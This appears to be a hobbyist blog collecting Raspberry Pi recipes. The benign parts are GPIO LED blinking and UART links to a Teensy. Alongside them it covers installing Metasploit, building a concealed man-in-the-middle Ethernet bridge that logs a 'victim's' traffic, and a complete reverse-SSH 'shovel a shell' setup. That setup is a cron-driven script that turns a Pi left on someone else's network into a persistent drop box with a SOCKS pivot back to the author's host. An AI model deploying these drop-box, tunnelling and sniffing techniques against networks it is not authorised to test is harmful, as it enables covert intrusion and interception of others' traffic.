Raspberry Pi Recipes

Installing Metasploit on the Raspberry Pi

This recipe will show you how to get a basic install of Metasploit on the Raspberry Pi. If you want more, skip to the bottom of this recipe. I’m using the Debian “wheezy” public beta (2012-06-18-wheezy-beta http://www.raspberrypi.org/archives/1435) but other distros may work as well. First we need to get root privileges, download the framework, ruby, subversion and libpcap. Depending on the modules you use you may need more. Then we can run msfconsole, though it will take awhile to load and if you are running another memory intensive app on your Raspberry Pi you may receive errors:

You guys know I love hardware keyloggers (which reminds me, at $35 for the Raspberry Pi and $16 for a Teensy I should work on a network enabled hardware keylogger), but why not an ethernet logger? The idea is simple, use the built-in Ethernet of the Raspberry Pi, add another USB Ethernet adapter, set up bridging and log everything with TCPDump! Or for that matter, you can use TCPDump’s capture filters to just grab what you want and pass on the rest (someone mentioned to me that making a Wall of Sheep/Wall of Social Science Majors would be a cool idea). I’d highly recommend finding a case to put your Raspberry Pi in for this project, this laying naked on the floor on in a wiring closet will stand out. Also, it will likely drop throughput quite a bit, especially if you are trying to work at gigabit speeds (We are talking a USB 2 Ethenet dongle after all). My script needs more testing, if the Raspberry Pi fails, the victim’s connection will go down.

First up, we need to install bridge-utils so we can set up a man in the middle Ethernet bridge, then use an editor to write a script to set up bridging and logging:

This recipe will be very basic. Just some simple IO (more accurately, just O) using the General Purpose Input/Output (GPIO) ports on the Raspberry Pi. For more info, and pin-outs, you should see:

This is the hello world of electronics. All it consists of is an LED and some jumper wires. I recommend getting a bunch of male and female jumpers. The circuit is simple, though I should probably have added a current limiting resistor.

The code is also simple, you could just type this all into a command line after SSHing into your Raspberry Pi, or you could make a script. All this does is turn the LED on and off at 1 second intervals.

The blinky example is ok, but the GPIO pins on the Raspberry Pi work at 3.3 volts, what if we want to interface with something that is working at 5v? For example, lets say you want to hook it up to an Arduino or a Teensy. The simplest solution might be to buy some logic level converters:

at about $2 per pop, these are small and easy to use. You get 4 IO lines, or two serial connections, depending on how you use them. I wired mine to a Teensy as follows:

We can also use the logic level converters to work with UART/Serial and interface with a Teensy or Arduino. Here is a simple diagram/schematic of the hook up. Keep in mind that TX from the Teensy goes to the RX on the Raspberry Pi and vice versa.

The code is also simple, I based it on some Paul had up on the Teensy website. All it does is print whatever comes in over the UART interface (notice I'm using 115200 bps as the connection speed).

// This line defines a "Uart" object to access the serial port
HardwareSerial Uart = HardwareSerial();

void setup() {
Uart.begin(115200);
}

void loop() {
char incomingByte;
if (Uart.available() > 0)
{
incomingByte = Uart.read();
Keyboard.print(incomingByte);
}
}

Now I can cat or echo things out to /dev/ttyAMA0, and the Teensy should print them out as seen in this video (again, crappy camera work):

These are just simple examples of using a Raspberry Pi to output to an Arduino or Teensy. The Raspberry Pi is cheaper than many Ethernet Shields for the Arduino, and a lot more powerful/flexible in it's own right. I plan to work later on bidirectional serial interfacing with the Raspberry Pi.

SSH Phone Home: Using the Raspberry Pi as a proxy/pivot (Shovel a Shell)

In this section I'll cover setting up a Raspberry Pi to send you a Reverse Shell using SSH (AKA: Shovel a shell). This is pretty good for blowing past NAT and some firewalls with weak egress filtering. The idea is that you can use these as drop boxes to leave behind on someone else's network, then have them remote back out to you. These instructions should work pretty much the same on any *nix device or distro that uses OpenSSH. Make sure you have OpenSSH installed, but most distros I've seen do.

These are the non-automated commands to do a reverse SSH connection and set up a Proxy/Pivot using OpenSSH:
On Raspberry Pi use the following command :

ssh -R 1974:localhost:22 root@some-pc-client

On PC (must have SSH server on box):

ssh -D 1080 -p 1974 pi@localhost

The above command also opens up a SOCKS port on you local PC host that you can use to tunnel traffic into the Raspberry Pis's network with.

Automating it

Ok, the commands above were just to do it manually, how about automating the shell shoveling? I based my work on Brandon Hutchinson’s script for automating the SSH reverse connection every 5 min, so check out his site.:
http://www.brandonhutchinson.com/Passwordless_ssh_logins.html
http://www.brandonhutchinson.com/ssh_tunnelling.html

Here are the steps:
1. SSH Keys Setup
Do the following on the Raspberry Pi, but replace “root” with the username on your home PC (I use home.irongeek.com in these examples)

ssh-keygen -t rsa

Use a blank passphrase. This next line is to copy of the key to the PC

cat ~/.ssh/id_rsa.pub | ssh root@home.irongeek.com "cat - >> ~/.ssh/authorized_keys"

2. Reverse SSH Automatic Script
Make a script called “autossh” on the Raspberry Pi with the contents of this script, replacing the parameters in green as needed:

#!/bin/sh

# Based on http://www.brandonhutchinson.com/ssh_tunnelling.html

# $REMOTE_HOST is the name of the remote system

REMOTE_HOST=home.irongeek.com

# Setting my username for home box, you will most likely want to change this

USER_NAME=root

# $REMOTE_PORT is the remote port number that will be used to tunnel

# back to this system

REMOTE_PORT=1974

# $COMMAND is the command used to create the reverse ssh tunnel

COMMAND="ssh -q -N -R $REMOTE_PORT:localhost:22 $USER_NAME@$REMOTE_HOST"

# Is the tunnel up? Perform two tests:

# 1. Check for relevant process ($COMMAND)

pgrep -f -x "$COMMAND" > /dev/null 2>&1 || $COMMAND

# 2. Test tunnel by looking at "netstat" output on $REMOTE_HOST

ssh $REMOTE_HOST netstat -an | egrep "tcp.*:$REMOTE_PORT.*LISTEN" \

   > /dev/null 2>&1

if [ $? -ne 0 ] ; then

   pkill -f -x "$COMMAND"

   $COMMAND

fi

and set it as executable with:

                    chmod 755 autossh

3. Use the “crontab –e” command on your Raspberry Pi to schedule the script to run every 5 min. The entry will be something like:

        */5 * * * * /home/pi/autossh
        SSH Automatic Script

4. Now go to you home PC and you should be able to use this command to connect to the waiting shell:

ssh –D 1080 -p 1974 pi@localhost

Use port 1080 on the localhost for tools that will work with a SOCKS proxy and tunnel traffic into the remote network.